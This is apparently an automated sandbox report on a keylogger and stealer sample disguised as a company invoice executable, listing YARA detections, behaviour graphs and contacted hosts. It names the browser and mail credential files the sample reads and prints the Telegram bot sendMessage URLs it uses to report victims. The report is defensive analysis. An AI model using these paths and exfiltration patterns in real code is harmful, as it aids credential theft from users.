Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Queries volume information: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Queries volume information: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 4820, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: GhrKoSGuCdvpJ.exe PID: 4268, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 4820, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Yara detected Credential Stealer
Source: Yara match File source: 11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 4820, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: GhrKoSGuCdvpJ.exe PID: 4268, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 4820, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: GhrKoSGuCdvpJ.exe PID: 4268, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 4820, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1501092 Sample: Autofill Manufacturing Sdn ... Startdate: 29/08/2024 Architecture: WINDOWS Score: 100 46 reallyfreegeoip.org 2->46 48 api.telegram.org 2->48 50 2 other IPs or domains 2->50 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Antivirus detection for URL or domain 2->62 68 13 other signatures 2->68 8 Autofill Manufacturing Sdn Bhd 28-08-2024.exe 7 2->8         started        12 GhrKoSGuCdvpJ.exe 5 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 46->64 66 Uses the Telegram API (likely for C&C communication) 48->66 process4 file5 38 C:\Users\user\AppData\...behaviorgraphhrKoSGuCdvpJ.exe, PE32 8->38 dropped 40 C:\...behaviorgraphhrKoSGuCdvpJ.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmp8289.tmp, XML 8->42 dropped 44 Autofill Manufactu... 28-08-2024.exe.log, ASCII 8->44 dropped 70 Adds a directory exclusion to Windows Defender 8->70 72 Injects a PE file into a foreign processes 8->72 14 Autofill Manufacturing Sdn Bhd 28-08-2024.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        74 Multi AV Scanner detection for dropped file 12->74 76 Machine Learning detection for dropped file 12->76 24 GhrKoSGuCdvpJ.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 52 api.telegram.org 149.154.167.220, 443, 49742, 49746 TELEGRAMRU United Kingdom 14->52 54 reallyfreegeoip.org 188.114.97.3, 443, 49707, 49710 CLOUDFLARENETUS European Union 14->54 56 checkip.dyndns.com 193.122.6.168, 49706, 49711, 49712 ORACLE-BMC-31898US United States 14->56 78 Loading BitLocker PowerShell Module 18->78 28 conhost.exe 18->28         started        30 WmiPrvSE.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        80 Tries to steal Mail credentials (via file / registry access) 24->80 82 Tries to harvest and steal browser information (history, passwords, etc) 24->82 36 conhost.exe 26->36         started        signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
188.114.97.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true
193.122.6.168
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false

Contacted Domains

Name IP Active
reallyfreegeoip.org 188.114.97.3 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 193.122.6.168 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2029/08/2024%20/%2019:20:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
https://reallyfreegeoip.org/xml/8.46.123.33 false
  • URL Reputation: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2030/08/2024%20/%2000:43:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
http://checkip.dyndns.org/ false
  • URL Reputation: safe
 unknown